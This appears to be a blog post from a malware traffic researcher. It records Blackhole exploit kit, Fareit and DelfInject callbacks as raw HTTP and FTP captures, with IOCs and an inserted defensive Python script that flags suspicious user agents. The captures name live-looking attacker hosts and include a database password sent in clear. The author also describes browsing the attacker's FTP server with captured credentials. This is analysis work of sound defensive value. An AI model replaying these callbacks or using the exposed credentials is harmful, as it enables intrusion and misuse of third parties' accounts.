Something somewhat interesting. Blackhole exploit at
GET /forum/links/public_version.php?yf=30:31:32:2v:1f&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&u=1f&hs=w&yy=e&jopa=6797956 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: jindalo.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
SHA256: 5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257
File name: blackhole.exe
Detection ratio: 1 / 46
Analysis date: 2013-04-21 21:37:27 UTC ( 0 minutes ago )
https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/
Ok, nothing new here. Whatever. Thanks for exploiting my Java. The strings output is all garbage; PEiD balked.
1,400+ UDP packets to port 16471, à la ZeroAccess, in about 20 minutes, and an interesting one on 55755.
GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
Ok, nothing new here. I'm located in Boca Raton playing golf with Tiger Woods, how did you guess?
__________________________________________
POST /10qVeAAAA/ebH7oAAAAA/rDhlJAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 88.191.130.98:8080
Content-Length: 339
Connection: Keep-Alive
Cache-Control: no-cache
IP seen on urlquery.net: http://urlquery.net/report.php?id=1768644
__________________________________________
POST /asp/intro.php HTTP/1.0
Host: 111.68.142.223
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
The user agent is a big indicator here. Somewhat interesting, documented by #MalwareMustDie: http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html
Consistent with Trojan Fareit callbacks (hat tip MalwareMustDie), but no botid URL following this.
__________________________________________
This one looks interesting. Using bit.ly, but a 301 to Google put the kibosh on this one.
POST /YddCcn? HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bit.ly
Connection: Keep-Alive
op=IncluirAvisos&HostBD=dbmy0060%2Ewhservidor%2Ecom&SenhaBD=delphi2020&UsuarioBD=turckatty_2&DatabaseBD=turckatty_2&sgdb=
Well, the user agent is known badness: here and here, dating back to 2010.
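Since the user agent carries most of the signal in these captures, here is a small added triage script (my own example, not part of the original post or of any tool it references) that parses request heads modelled on the ones above and flags the indicators the post calls out. The sample requests and the labels are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample request heads modelled on the captures in this post (first line + a few headers).
SAMPLE_REQUESTS = [
    "GET /forum/links/public_version.php?yf=30:31&qe=2v HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29\r\n"
    "Host: jindalo.ru:8080\r\n",
    "POST /asp/intro.php HTTP/1.0\r\n"
    "Host: 111.68.142.223\r\n"
    "Content-Type: application/octet-stream\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n",
    "POST /YddCcn? HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Host: bit.ly\r\n",
    "GET /app/geoip.js HTTP/1.0\r\n"
    "Host: j.maxmind.com\r\n",  # no User-Agent at all; benign-looking geoip lookup
]

# User-Agent substrings the post calls out as indicators (matched case-insensitively).
BAD_UA_PATTERNS = {
    r"WinHttp\.WinHttpRequest\.5": "WinHttpRequest UA (known badness per post)",
    r"MSIE 5\.0; Windows 98": "Fareit-style UA",
}

def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request head into method/path/version plus lower-cased header names."""
    lines = raw.strip().split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # first colon only; Host values may contain ':port'
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, **headers}

def triage(raw: str) -> List[str]:
    """Return the indicator labels that fire on one request head (empty list means nothing flagged)."""
    req = parse_request(raw)
    ua = req.get("user-agent", "")
    host = req.get("host", "")
    hits = [label for pattern, label in BAD_UA_PATTERNS.items() if re.search(pattern, ua, re.IGNORECASE)]
    # A Java client fetching a .php landing page on a non-standard port is the Blackhole pattern above.
    if "Java/" in ua and host.endswith(":8080") and req["path"].split("?")[0].endswith(".php"):
        hits.append("Java client -> .php on :8080 (exploit kit landing)")
    # A binary POST body from an ancient browser UA is the check-in shape seen in the Fareit capture.
    if req["method"] == "POST" and req.get("content-type") == "application/octet-stream":
        hits.append("octet-stream POST (check-in style)")
    return hits
```

Run it over each entry of SAMPLE_REQUESTS; only the geoip lookup comes back with no hits.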
GET /WggQJ3RVGrKgdj0xLjImaWQ9NDIzODYxMDcxNiZhaWQ9MzA1NjImc2lkPTAmb3M9NS4xLTMyGuzZ0s7u HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Accept-Language: en-us
Connection: close
I surmise this is a check-in because I get a 200 OK but the content is empty; just speculation. Site sinkholed.
Ok, now for some FTP. The malware calls out to an FTP server with the user name and password in clear text (most appreciated).
220 Microsoft FTP Service
USER <redacted>
331 Password required for <redacted>.
PASS <redacted>
230 User logged in.
215 Windows_NT
CWD /dados/maxo4/
250 CWD command successful.
PASV
227 Entering Passive Mode (<redacted>).
RETR E174D3044694.jpg
550 The system cannot find the file specified.
This thing tried multiple jpg files, none of which could be found.
Well, I'm not going to let that one go by.
Piqued my interest. I go digging and I find a root directory.
Interesting, so I download the jpgs that are there.
The worm is a variant of DelfInject.
MZP ÿÿ¸@ º ´ Í!¸ LÍ!This program must be run under Win32 $
Dumping the strings:
DVCLAL
PACKAGEINFO
PORCOS
TDTCONFIG
TFORM1
TFRMDATETIME
xn7
CPlApplet
kernel32.dll
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualFree
oleaut32.dll
SysFreeString
advapi32.dll
RegQueryValueExW
user32.dll
LoadStringW
msimg32.dll
AlphaBlend
gdi32.dll
UnrealizeObject
version.dll
VerQueryValueW
ole32.dll
OleUninitialize
comctl32.dll
InitializeFlatSB
winspool.drv
OpenPrinterW
ntdll
NtUnmapViewOfSection
Interesting DNS traffic to a Sprint Wireless address; no further traffic on this one. Pwned mobile? (Guessing.)
00000085 : 00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30 [.......173.4.250]
00000095 : 02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61 [.10.in-addr.arpa]
173.4.250.10
88.191.130.98:8080
jindalo.ru:8080
111.68.142.223
Additional References:
http://labs.snort.org/iplists/urllist-2012-07-01
http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI